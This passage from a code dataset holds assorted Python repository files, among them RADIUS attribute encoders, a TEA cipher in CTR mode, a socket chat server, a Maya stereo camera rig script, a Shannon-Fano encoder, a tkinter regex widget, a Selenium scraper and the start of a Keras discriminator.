= int(input())\ncoins = list(map(int, input().split()))\ncoins.sort(reverse=True)\ntotal = sum(coins)\ncount = 0\ntemp_sum = 0\nfor i in coins:\n count += 1\n temp_sum += i\n total -= i\n if total < temp_sum:\n 
break\n\n\nprint(count)\n","repo_name":"rajeevdodda/Codeforces","sub_path":"CF-A/101-200/CF160-D2-A.py","file_name":"CF160-D2-A.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36656892094","text":"# tools.py\n#\n# Utility functions\nfrom netaddr import IPAddress\nfrom netaddr import IPNetwork\nimport struct\nimport six\nimport binascii\n\n\ndef EncodeString(str):\n if len(str) > 253:\n raise ValueError('Can only encode strings of <= 253 characters')\n if isinstance(str, six.text_type):\n return str.encode('utf-8')\n else:\n return str\n\n\ndef EncodeOctets(str):\n if len(str) > 253:\n raise ValueError('Can only encode strings of <= 253 characters')\n\n if str.startswith(b'0x'):\n hexstring = str.split(b'0x')[1]\n return binascii.unhexlify(hexstring)\n else:\n return str\n\n\ndef EncodeAddress(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('Address has to be a string')\n return IPAddress(addr).packed\n\n\ndef EncodeIPv6Prefix(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('IPv6 Prefix has to be a string')\n ip = IPNetwork(addr)\n return struct.pack('2B', *[0, ip.prefixlen]) + ip.ip.packed\n\n\ndef EncodeIPv6Address(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('IPv6 Address has to be a string')\n return IPAddress(addr).packed\n\n\ndef EncodeAscendBinary(str):\n \"\"\"\n Format: List of type=value pairs sperated by spaces.\n\n Example: 'family=ipv4 action=discard direction=in dst=10.10.255.254/32'\n\n Type:\n family ipv4(default) or ipv6\n action discard(default) or accept\n direction in(default) or out\n src source prefix (default ignore)\n dst destination prefix (default ignore)\n proto protocol number / next-header number (default ignore)\n sport source port (default ignore)\n dport destination port (default ignore)\n sportq source port qualifier (default 0)\n dportq destination port qualifier (default 0)\n\n Source/Destination Port Qualifier:\n 0 no compare\n 1 less than\n 2 equal to\n 3 greater than\n 4 not equal to\n \"\"\"\n\n terms = {\n 'family': b'\\x01',\n 'action': b'\\x00',\n 'direction': b'\\x01',\n 'src': b'\\x00\\x00\\x00\\x00',\n 'dst': b'\\x00\\x00\\x00\\x00',\n 'srcl': b'\\x00',\n 'dstl': b'\\x00',\n 'proto': b'\\x00',\n 'sport': b'\\x00\\x00',\n 'dport': b'\\x00\\x00',\n 'sportq': b'\\x00',\n 'dportq': b'\\x00'\n }\n\n for t in str.split(' '):\n key, value = t.split('=')\n if key == 'family' and value == 'ipv6':\n terms[key] = b'\\x03'\n if terms['src'] == b'\\x00\\x00\\x00\\x00':\n terms['src'] = 16 * b'\\x00'\n if terms['dst'] == b'\\x00\\x00\\x00\\x00':\n terms['dst'] = 16 * b'\\x00'\n elif key == 'action' and value == 'accept':\n terms[key] = b'\\x01'\n elif key == 'direction' and value == 'out':\n terms[key] = b'\\x00'\n elif key == 'src' or key == 'dst':\n ip = IPNetwork(value)\n terms[key] = ip.ip.packed\n terms[key+'l'] = struct.pack('B', ip.prefixlen)\n elif key == 'sport' or key == 'dport':\n terms[key] = struct.pack('!H', int(value))\n elif key == 'sportq' or key == 'dportq' or key == 'proto':\n terms[key] = struct.pack('B', int(value))\n\n trailer = 8 * b'\\x00'\n\n result = b''.join((terms['family'], terms['action'], terms['direction'], b'\\x00', \n terms['src'], terms['dst'], terms['srcl'], terms['dstl'], terms['proto'], b'\\x00',\n terms['sport'], terms['dport'], terms['sportq'], terms['dportq'], b'\\x00\\x00', trailer))\n return result\n\n\ndef EncodeInteger(num, format='!I'):\n 
try:\n        num = int(num)\n    except:\n        raise TypeError('Can not encode non-integer as integer')\n    return struct.pack(format, num)\n\ndef EncodeInteger64(num, format='!Q'):\n    try:\n        num = int(num)\n    except:\n        raise TypeError('Can not encode non-integer as integer64')\n    return struct.pack(format, num)\n\ndef EncodeDate(num):\n    if not isinstance(num, int):\n        raise TypeError('Can not encode non-integer as date')\n    return struct.pack('!I', num)\n\n\ndef DecodeString(str):\n    try:\n        return str.decode('utf-8')\n    except:\n        return str\n\n\ndef DecodeOctets(str):\n    return str\n\n\ndef DecodeAddress(addr):\n    return '.'.join(map(str, struct.unpack('BBBB', addr)))\n\n\ndef DecodeIPv6Prefix(addr):\n    addr = addr + b'\\x00' * (18-len(addr))\n    _, length, prefix = ':'.join(map('{0:x}'.format, struct.unpack('!BB'+'H'*8, addr))).split(\":\", 2)\n    return str(IPNetwork(\"%s/%s\" % (prefix, int(length, 16))))\n\n\ndef DecodeIPv6Address(addr):\n    addr = addr + b'\\x00' * (16-len(addr))\n    prefix = ':'.join(map('{0:x}'.format, struct.unpack('!'+'H'*8, addr)))\n    return str(IPAddress(prefix))\n\n\ndef DecodeAscendBinary(str):\n    return str\n\n\ndef DecodeInteger(num, format='!I'):\n    return (struct.unpack(format, num))[0]\n\ndef DecodeInteger64(num, format='!Q'):\n    return (struct.unpack(format, num))[0]\n\ndef DecodeDate(num):\n    return (struct.unpack('!I', num))[0]\n\n\ndef EncodeAttr(datatype, value):\n    if datatype == 'string':\n        return EncodeString(value)\n    elif datatype == 'octets':\n        return EncodeOctets(value)\n    elif datatype == 'integer':\n        return EncodeInteger(value)\n    elif datatype == 'ipaddr':\n        return EncodeAddress(value)\n    elif datatype == 'ipv6prefix':\n        return EncodeIPv6Prefix(value)\n    elif datatype == 'ipv6addr':\n        return EncodeIPv6Address(value)\n    elif datatype == 'abinary':\n        return EncodeAscendBinary(value)\n    elif datatype == 'signed':\n        return EncodeInteger(value, '!i')\n    elif datatype == 'short':\n        return EncodeInteger(value, '!H')\n    elif datatype == 'byte':\n        return EncodeInteger(value, '!B')\n    elif datatype == 'date':\n        return EncodeDate(value)\n    elif datatype == 'integer64':\n        return EncodeInteger64(value)\n    else:\n        raise ValueError('Unknown attribute type %s' % datatype)\n\n\ndef DecodeAttr(datatype, value):\n    if datatype == 'string':\n        return DecodeString(value)\n    elif datatype == 'octets':\n        return DecodeOctets(value)\n    elif datatype == 'integer':\n        return DecodeInteger(value)\n    elif datatype == 'ipaddr':\n        return DecodeAddress(value)\n    elif datatype == 'ipv6prefix':\n        return DecodeIPv6Prefix(value)\n    elif datatype == 'ipv6addr':\n        return DecodeIPv6Address(value)\n    elif datatype == 'abinary':\n        return DecodeAscendBinary(value)\n    elif datatype == 'signed':\n        return DecodeInteger(value, '!i')\n    elif datatype == 'short':\n        return DecodeInteger(value, '!H')\n    elif datatype == 'byte':\n        return DecodeInteger(value, '!B')\n    elif datatype == 'date':\n        return DecodeDate(value)\n    elif datatype == 'integer64':\n        return DecodeInteger64(value)\n    else:\n        raise ValueError('Unknown attribute type %s' % datatype)\n","repo_name":"zeroleo12345/radius_server_python","sub_path":"src/pyrad/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7061,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"33376708784","text":"# design of the point instance object: a point on the plane coordinate system\nclass point:\n    # define the initializer function __init__() and the fixed parameter self\n    def __init__(self,x,y):\n        self.x=x\n        self.y=y\n    # this instance object contains two instance attributes, X and Y\n    # this class is defined in order to create instance objects\n\n# create the first instance object\np = point(3,4) # point() creates a point instance object and stores it in the variable p\nprint(p.x,p.y) 
# instance object.attribute name\n\n# create the second instance object\np2=point(5,6) # 5 corresponds to x, 6 corresponds to y\nprint(p2.x,p2.y) # p2.x corresponds to the x in self.x=x above","repo_name":"alankowabunga/Python","sub_path":"peng_basics/17.3instance.py","file_name":"17.3instance.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71773105105","text":"def reduce(function,iterable):\n\n    if len(iterable) == 0:\n        return None\n    result=iterable[0]\n    for x in iterable[1:]:\n        result = function(result,x)\n    return result\n\nprint(reduce(lambda x,y: x+y, [1,2,3,4]))","repo_name":"Kacyk27/Kacyk27-103-exercises-Advanced-Python-Programming","sub_path":"Exercise063.py","file_name":"Exercise063.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44224459206","text":"# ********************************************* #\n# Tiny Encryption Algorithm CTR Implementation #\n# Ian Bolin & Trevor Loula #\n# CS-3350 Foundations of Computer Security #\n# ********************************************* #\n\nimport sys\nimport tea_algorithm\n\nclass TEA_CTR(tea_algorithm.TEA):\n    #bytestrings must be padded to a length of x*8 bytes (64 bits) to align with block length.\n    #this is to allow for different padding schemes\n\n    #input: bytestring, int[4], int[2]\n    @staticmethod\n    def encrypt(plaintext, key, iv):\n        key = [int.from_bytes(key[0], \"big\"), int.from_bytes(key[1], \"big\"), int.from_bytes(key[2], \"big\"), int.from_bytes(key[3], \"big\")]\n        iv = [int.from_bytes(iv[0], \"big\"), int.from_bytes(iv[1], \"big\")]\n        if len(plaintext) % 8 != 0:\n            print(\"Bad plaintext length\")\n            return b\"\"\n        ciphertext = b\"\"\n        for i in range(0, len(plaintext), 8):\n            temp = [int.from_bytes(plaintext[i:i+4], \"big\"), int.from_bytes(plaintext[i+4:i+8], \"big\")]\n            (Left, Right) = tea_algorithm.TEA.encrypt(iv, key)\n            ciphertext += (Left ^ temp[0]).to_bytes(4, \"big\")\n            ciphertext += (Right ^ temp[1]).to_bytes(4, \"big\")\n            if (iv[1] == 0xffffffff):\n                iv[1] = 0x0\n                if (iv[0] == 0xffffffff):\n                    iv[0] = 0x0\n                else:\n                    iv[0] += 1\n            else:\n                iv[1] += 1\n        return ciphertext\n\n    #input: bytestring, int[4], int[2]\n    @staticmethod\n    def decrypt(ciphertext, key, iv):\n        key = [int.from_bytes(key[0], \"big\"), int.from_bytes(key[1], \"big\"), int.from_bytes(key[2], \"big\"), int.from_bytes(key[3], \"big\")]\n        iv = [int.from_bytes(iv[0], \"big\"), int.from_bytes(iv[1], \"big\")]\n        if len(ciphertext) % 8 != 0:\n            print(\"Bad ciphertext length\")\n            return b\"\"\n        plaintext = b\"\"\n        for i in range(0, len(ciphertext), 8):\n            temp = [int.from_bytes(ciphertext[i:i+4], \"big\"), int.from_bytes(ciphertext[i+4:i+8], \"big\")]\n            (Ltemp, Rtemp) = tea_algorithm.TEA.encrypt(iv, key)\n            plaintext += (Ltemp ^ temp[0]).to_bytes(4, \"big\")\n            plaintext += (Rtemp ^ temp[1]).to_bytes(4, \"big\")\n            if (iv[1] == 0xffffffff):\n                iv[1] = 0x0\n                if (iv[0] == 0xffffffff):\n                    iv[0] = 0x0\n                else:\n                    iv[0] += 1\n            else:\n                iv[1] += 1\n        return plaintext","repo_name":"tloula/tea-implementation","sub_path":"tea_ctr.py","file_name":"tea_ctr.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31807206694","text":"from threading import Thread\nfrom socket import AF_INET, socket, SOCK_STREAM\n\n\nclients = {}\naddresses = {}\naux_clients = {}\n\nHOST = 'localhost'\nPORT = 33000\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nSERVER = socket(AF_INET, 
SOCK_STREAM)\nSERVER.bind(ADDR)\n\ncontinue_listening = True\n\n\ndef accept_incoming_connections():\n    \"\"\"Handle incoming connections from new clients\"\"\"\n    while True:\n        client, client_address = SERVER.accept()\n        print(\"%s:%s Se ha conectado.\" % client_address)\n        addresses[client] = client_address\n        Thread(target=handle_client, args=(client,)).start()\n\n\ndef handle_client(client):\n    \"\"\"Handle a single connected client\"\"\"\n\n    name = client.recv(BUFSIZ).decode(\"utf8\")\n    clients[client] = name\n    # Do not allow duplicate client names\n    aux_clients[name] = client\n    print(name)\n    msg = \"serverupdt|%s Se ha unido!\" % name\n    msg_user_list = str(list(clients.values()))\n    msg = msg+\" listado de usuarios: \"+msg_user_list\n    broadcast(bytes(msg, \"utf8\"))\n    global continue_listening\n    while continue_listening:\n        msg = client.recv(BUFSIZ)\n        print(msg)\n        decoded_msg = msg.decode(\"utf-8\").split('|')\n        print(decoded_msg)\n        if decoded_msg[0] == \"file\":\n            print(\"file\")\n            continue_listening = False\n            broadcast(bytes(decoded_msg[1]+\"|\"+name+\"|\"\n                            + \"File Sent: \"+decoded_msg[2], \"utf-8\"))\n            send_file_to_client(client, decoded_msg[1], decoded_msg[2])\n        elif decoded_msg[0] != \"{quit}\":\n            if decoded_msg[0] == \"broadcast\":\n                broadcast(msg)\n            else:\n                send_message_to_clients(msg)\n        else:\n            client.close()\n            del clients[client]\n            del aux_clients[name]\n            msg = \"serverupdt|%s Se ha ido, ista de clientes.\" % name\n            msg_user_list = str(list(clients.values()))\n            msg = msg+\" listado de usuarios: \"+msg_user_list\n            broadcast(bytes(msg, \"utf8\"))\n            break\n\n\ndef send_message_to_clients(message):\n    message = message.decode(\"utf8\").split(\"|\")\n    userlist = message[:-2]\n    print(userlist)\n    for client in userlist:\n        if client in aux_clients:\n            client_to = aux_clients[client]\n            msg = client+\"|\" + message[-2]+\"|\"+message[-1]\n            print(msg)\n            client_to.send(bytes(msg, \"utf-8\"))\n\n\ndef send_file_to_client(current, _client, file_name_format):\n    file_name_format = file_name_format.split('.')\n    f_format = file_name_format.pop()\n    f_name = ' '.join(file_name_format)\n    filename_l = 'temp.'+f_format\n    current.settimeout(1)\n    with open(filename_l, 'wb') as f:\n        print('file opened')\n        while True:\n            print('receiving data...')\n            try:\n                data = current.recv(BUFSIZ)\n                print('data=%s' % data)\n                f.write(data)\n            except OSError:\n                print('done...')\n                break\n\n    # TODO send warning for file return\n\n    print(\"forwarding to client\")\n    client_to = aux_clients[_client]\n    client_to.send(bytes(\"file|\"+f_name+\".\"+f_format, \"utf-8\"))\n\n    f = open(filename_l, 'rb')\n    chunk = f.read(BUFSIZ)\n    while (chunk):\n        client_to.send(chunk)\n        print('Sent ', repr(chunk))\n        chunk = f.read(BUFSIZ)\n    f.close()\n    client_to.send(bytes(\"stop\", \"utf-8\"))\n    print('Done sending')\n    current.settimeout(None)\n    global continue_listening\n    continue_listening = True\n\n\ndef broadcast(msg, prefix=\"\"): # prefix is used for name identification\n    \"\"\"Send a message to all connected clients\"\"\"\n\n    for sock in clients:\n        sock.send(bytes(prefix, \"utf8\")+msg)\n\n\nif __name__ == \"__main__\":\n    SERVER.listen(5)\n    print(\"Waiting for connection...\")\n    ACCEPT_THREAD = Thread(target=accept_incoming_connections)\n    ACCEPT_THREAD.start()\n    ACCEPT_THREAD.join()\n    SERVER.close()\n","repo_name":"Wason1797/Chat-Sockets-Py","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"31828640766","text":"'''\nbuild a simple off-axis stereo camera rig, based on vray env\nfor Maya 2016\n'''\n\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport maya.app.stereo.stereoCameraRig\n\n# load vray and make it as currentRenderer\nif not cmds.pluginInfo('vrayformaya', q= 1, loaded= 1):\n cmds.loadPlugin('vrayformaya')\ncmds.setAttr('defaultRenderGlobals.currentRenderer', 'vray', type= 'string')\n\ntargetCamera = ''\ntargetZeroPn = ''\nautoParent = 0\n\nif len(cmds.ls(sl= 1, hd= 2)) >= 1:\n\ttargetCamera = cmds.ls(sl= 1, hd= 2)[0]\n\ttry:\n\t\ttargetZeroPn = cmds.ls(sl= 1, hd= 2)[1]\n\texcept:\n\t\tpass\n\tautoParent = 1\nelse:\n\tpass\n\n# build vray stereo camera rig and do some basic stereo setup\nmyStereoCamRig = maya.app.stereo.stereoCameraRig.createStereoCameraRig(rigName= 'StereoCamera')\nmyStereoCamCenterShape = cmds.listRelatives(myStereoCamRig[0], s= 1, f= 1)[0]\ncmds.setAttr(myStereoCamCenterShape + '.stereo', 2)\nmel.eval('vray addAttributesFromGroup \"' + myStereoCamCenterShape + '\" vray_cameraStereoscopic 1')\ncmds.setAttr(myStereoCamCenterShape + '.vrayCameraStereoscopicOn', 1)\ncmds.setAttr(myStereoCamCenterShape + '.vrayCameraStereoscopicAdjustResolution', 1)\n\n\n# make locators and group\nmyZeroPoint_invert = cmds.group(em= 1)\nmyZeroPoint_offset = cmds.group(em= 1)\nmyZeroPoint_loc = cmds.spaceLocator()[0]\nmyZeroPoint_handle = cmds.spaceLocator()[0]\n\n\n# assembling rigs\ncmds.parent(myZeroPoint_invert, myStereoCamRig[0])\ncmds.parent(myZeroPoint_loc, myZeroPoint_invert)\ncmds.parent(myZeroPoint_handle, myZeroPoint_offset)\ncmds.pointConstraint(myZeroPoint_handle, myZeroPoint_loc, mo= 0)\ncmds.setAttr(myZeroPoint_invert + '.ry', 180)\ncmds.setAttr(myZeroPoint_loc + '.v', 0)\ncmds.connectAttr(myZeroPoint_loc + '.tz', myStereoCamCenterShape + '.zeroParallax')\n\n# connect some useful attrs\ncmds.addAttr(myZeroPoint_handle, ln= 'zeroParallaxPlane', at= 'bool', k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.zeroParallaxPlane', myStereoCamCenterShape + '.zpp')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'FocalLength', at= 'float', min= 2.5, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.FocalLength', myStereoCamCenterShape + '.focalLength')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'InteraxialSeparation', at= 'float', min= 0, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.InteraxialSeparation', myStereoCamCenterShape + '.interaxialSeparation')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'CameraLocScale', at= 'float', min= 0.001, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', myStereoCamCenterShape + '.lls')\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', cmds.listRelatives(myStereoCamRig[1], s= 1, f= 1)[0] + '.lls')\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', cmds.listRelatives(myStereoCamRig[2], s= 1, f= 1)[0] + '.lls')\n\n\n# setup default\ncmds.setAttr(myZeroPoint_handle + '.zeroParallaxPlane', 1)\ncmds.setAttr(myZeroPoint_handle + '.FocalLength', 16)\ncmds.setAttr(myZeroPoint_handle + '.InteraxialSeparation', 6.35)\ncmds.setAttr(myZeroPoint_handle + '.CameraLocScale', 1)\ncmds.setAttr(myZeroPoint_handle + '.tz', -10)\ncmds.select(myZeroPoint_handle, r= 1)\n\n\n# hide or lock unused attr\ndef attrLocknHide(atName, at):\n\tcmds.setAttr(atName + '.' + at + 'x', k= 0)\n\tcmds.setAttr(atName + '.' + at + 'y', k= 0)\n\tcmds.setAttr(atName + '.' + at + 'z', k= 0)\n\tcmds.setAttr(atName + '.' 
+ at, l= 1)\n\nattrLocknHide(myZeroPoint_handle, 'r')\nattrLocknHide(myStereoCamRig[0], 's')\nattrLocknHide(myZeroPoint_loc, 't')\nattrLocknHide(myZeroPoint_loc, 'r')\nattrLocknHide(myZeroPoint_loc, 's')\nattrLocknHide(myZeroPoint_invert, 't')\nattrLocknHide(myZeroPoint_invert, 'r')\nattrLocknHide(myZeroPoint_invert, 's')\n\n\nif autoParent:\n\tfail = []\n\ttry:\n\t\tcmds.parentConstraint(targetCamera, myStereoCamRig[0], mo= 0)\n\texcept:\n\t\tfail.append('Camera -> ' + targetCamera)\n\ttry:\n\t\tcmds.parentConstraint(targetZeroPn, myZeroPoint_offset, mo= 0)\n\texcept:\n\t\tfail.append('ZeroPoint -> ' + targetZeroPn)\n\tif fail:\n\t\tcmds.warning('Fail to auto parent: ' + str(fail))\n\n\n# rename rigs\ncmds.rename(myZeroPoint_invert,'zeroPoint_invert')\ncmds.rename(myZeroPoint_loc,'zeroPoint_loc')\ncmds.rename(myZeroPoint_offset,'zeroPoint_offset')\ncmds.rename(myZeroPoint_handle,'zeroPoint_handle')","repo_name":"davidlatwe/MS_Research","sub_path":"_research/stereoRig.py","file_name":"stereoRig.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19615884597","text":"def divide(nodes_dict, l_index, r_index):\r\n    if ((r_index - l_index) == 1):\r\n        # add_prefix(nodes_dict,l_index,l_index+1,'1')\r\n        return\r\n    elif (r_index <= l_index):\r\n        return\r\n    spl_index = l_index + (r_index - l_index) // 2\r\n    # print \"split index = %d\" % spl_index\r\n    l_sum = sum([x._freak for x in nodes_dict[l_index: spl_index]])\r\n    r_sum = sum([x._freak for x in nodes_dict[spl_index:r_index]])\r\n    while True:\r\n        delta = l_sum - r_sum\r\n        # print \"delta = %d\" % delta\r\n        if (delta < 0):\r\n            l_sum = l_sum + nodes_dict[spl_index]._freak\r\n            r_sum = r_sum - nodes_dict[spl_index]._freak\r\n            spl_index_temp = spl_index + 1\r\n        elif (delta > 0):\r\n            spl_index_temp = spl_index - 1\r\n            l_sum = l_sum - nodes_dict[spl_index_temp]._freak\r\n            r_sum = r_sum + nodes_dict[spl_index_temp]._freak\r\n        if (abs(delta) > abs(l_sum - r_sum)):\r\n            spl_index = spl_index_temp\r\n        else:\r\n            add_state(nodes_dict, l_index, spl_index, '1')\r\n            # print \"left: %s\" % nodes_dict[l_index: spl_index]\r\n            divide(nodes_dict, l_index, spl_index)\r\n            add_state(nodes_dict, spl_index, r_index, '0')\r\n            # print \"right: %s\" % nodes_dict[spl_index:r_index]\r\n            divide(nodes_dict, spl_index, r_index)\r\n            return\r\n\r\n# return {\"left\":[x for x in srt_dict[l_index:spl_index]],\"right\":[x for x in srt_dict[spl_index:r_index]]}\r\n\r\ndef add_state(nodes_dict, start, end, bin_state):\r\n    for index in range(start, end):\r\n        temp = nodes_dict[index]\r\n        temp.addCode(bin_state)\r\n\r\n\r\ndef sort(dict):\r\n    return sorted(list(dict.items()), key=lambda item: item[1], reverse=True)\r\n\r\n\r\nclass Node:\r\n    _code = \"\"\r\n    _signal = 0\r\n    _freak = 0\r\n\r\n    def __init__(self, item):\r\n        self._signal = item[0]\r\n        self._freak = item[1]\r\n\r\n    def __repr__(self):\r\n        return \"Node(%d)-%s\" % (self._signal, self._code)\r\n\r\n    def addCode(self, bin_state):\r\n        self._code = self._code + bin_state\r\n\r\n\r\ndef get_encoded_dict(dict):\r\n    srt_dict = sort(dict)\r\n    nodes_dict = [Node(x) for x in srt_dict]\r\n    divide(nodes_dict, 0, len(nodes_dict))\r\n    return {node._signal: node._code for node in nodes_dict}\r\n\r\n\r\ndef encode(signals, map):\r\n    dec_code = get_encoded_dict(map)\r\n    return (''.join([str(dec_code[x]) for x in signals]) if len(dec_code) > 1 else '1' * len(signals),\r\n            dict((v, k) for k, v in dec_code.items()))\r\n\r\n\r\ndef 
size_list_to_str(temp):\r\n    return sum(map(lambda x: len(str(x)), temp)) + len(temp)\r\n\r\n\r\n","repo_name":"ILDAR9/semestr","sub_path":"semestr/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27160430900","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport re\n\nclass RegexEntry(ttk.Labelframe):\n    \"\"\"Class that holds an entry box for a regular expression with flags\"\"\"\n    # This is a chopped up copy of regex tester demo on python.org\n    def __init__(self,master):\n        # Init the parent frame for this call that all widgets will sit in\n        ttk.LabelFrame.__init__(self,master,text='Regular Expression')\n        self.grid(sticky='nsew',padx=5,pady=5)\n        self.grid_columnconfigure(0,weight=1)\n        self.grid_rowconfigure(6,weight=1)\n\n        self.compiled=None\n        self.new_status_display_label()\n        self.new_re_entry()\n\n        # This adds all the check boxes for re flags\n        self.addoptions()\n        self.recompile()\n\n    def new_status_display_label(self):\n        \"\"\" Displays any re compile errors \"\"\"\n        self.statusdisplay = ttk.Label(self, text='')\n        self.statusdisplay.grid(sticky='nwe',pady=5,padx=5,row=0,column=0,ipadx=5,ipady=5)\n        self.bg=self.statusdisplay['background']\n\n    def new_re_entry(self):\n        \"\"\" Entry the re string \"\"\"\n        self.var=tk.StringVar(self)\n        # Entry widget to type the re into\n        self.entry=ttk.Entry(self,textvariable=self.var)\n        self.entry.grid(sticky='nwe',pady=5,padx=5,row=1,column=0)\n        # Recompile the regular expression every time a key is pressed in the entry widget\n        self.entry.bind('<KeyRelease>', self.recompile) \n    \n    def addoptions(self):\n        \"\"\"Adds re Flags under regex entry\"\"\"\n        self.frames = []\n        self.boxes = []\n        self.vars = []\n        for index,name in enumerate(('IGNORECASE',\n                     'MULTILINE',\n                     'DOTALL',\n                     'VERBOSE'),start=1):\n            if len(self.boxes) % 3 == 0:\n                frame = ttk.Frame(self)\n                frame.grid(sticky='nw')\n                self.frames.append(frame)\n            val = getattr(tk.re, name).value\n            var = tk.IntVar()\n            box = ttk.Checkbutton(frame,\n                    variable=var, text=name,\n                    offvalue=0, onvalue=val,\n                    command=self.recompile)\n\n            box.grid(sticky='nw',row=2,column=index)\n            self.boxes.append(box)\n            self.vars.append(var)\n\n    def getflags(self):\n        \"\"\"Retrieves re flags from checkboxes under regex entry\"\"\"\n        flags = 0\n        for var in self.vars:\n            flags = flags | var.get()\n        return flags\n\n    def recompile(self, event=None):\n        \"\"\"Recompiles the Regular Expression and updates the statusdisplay\"\"\"\n        try:\n            self.compiled = re.compile(self.entry.get(),\n                            self.getflags())\n            self.statusdisplay.config(text=\"\", background=self.bg)\n        except tk.re.error as msg:\n            self.compiled = None\n            self.statusdisplay.config(\n                text=f\"re.error: {str(msg)}\",\n                background=\"red\")\n","repo_name":"Razmo99/Tenderizer","sub_path":"Tenderizer/app_tk_widgets/components/regexentry.py","file_name":"regexentry.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3798714330","text":"from selenium import webdriver\nimport os\ndriver = webdriver.Firefox(executable_path=\"./firefoxDriver/geckodriver\")\nfrom selenium.webdriver.common.by import By\ndriver.get(\"https://doko.dwit.edu.np/class/show/1?stream=BSc.CSIT\")\nalllinks = driver.find_elements(By.XPATH,'//html/body/div[2]/section/section/section/div/div/a/p')\nfor link in alllinks:\n    print(link.text)\n\nfinalPath = 
os.path.join(os.getcwd(),\"MyText.txt\")\nprint(finalPath)\n\nfor x in alllinks:\n name = x.text\n filename = x.text + \".txt\"\n d = open(filename,\"w\")\n d.write(\"i am \"+ name )\ndriver.close()\n ","repo_name":"Ashwot-Acharya/Programming-Work","sub_path":"selenuim/test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72448307985","text":"from __future__ import print_function\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Input, Dense, Activation\nfrom keras.layers import LSTM, GRU, SimpleRNN\nfrom keras.optimizers import RMSprop, Adam\nfrom keras.utils.data_utils import get_file\nfrom keras.layers.normalization import BatchNormalization as BN\nfrom keras.layers.noise import GaussianNoise as GN\nfrom keras.layers.noise import GaussianDropout as GD\nimport numpy as np\nimport random\nimport sys\nimport tensorflow as tf \ntf.logging.set_verbosity(tf.logging.ERROR)\nimport glob\nimport json\nimport pickle\nimport msgpack\nimport msgpack_numpy as mn\nmn.patch()\nimport MeCab\nimport plyvel\nfrom itertools import cycle as Cycle\nimport dill\n\ndef discriminator_model():\n from keras.layers import Input, Dense, Embedding, merge, Convolution2D as Conv2D, MaxPooling2D, Dropout, ZeroPadding2D\n from keras.layers.core import Reshape, Flatten\n from keras.models import Model, load_model\n from keras.layers.merge import add, concatenate\n sequence_length = 30\n embedding_dim = 256 \n vocabulary_size = 10\n num_filters = 512\n filter_sizes = [3,4,5,1,2]\n inputs = Input(shape=(sequence_length,embedding_dim,), dtype='float64')\n #embedding = Embedding(output_dim=embedding_dim, input_dim=vocabulary_size, input_length=sequence_length)(inputs)\n reshape = Reshape((sequence_length,embedding_dim,1))(inputs)\n #Conv2D(512, (3, 256), padding=\"valid\", kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")\n\n conv_0 = Conv2D(num_filters, (filter_sizes[0], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_1 = Conv2D(num_filters, (filter_sizes[1], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_2 = Conv2D(num_filters, (filter_sizes[2], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_3 = Conv2D(num_filters, (filter_sizes[3], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_4 = Conv2D(num_filters, (filter_sizes[4], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n # `MaxPooling2D(pool_size=(28, 1), padding=\"valid\", data_format=\"channels_last\", strides=(1, 1))\n maxpool_0 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[0] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_0)\n maxpool_1 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[1] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_1)\n maxpool_2 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[2] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_2)\n maxpool_3 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[3] + -3, 1), strides=(1,1), 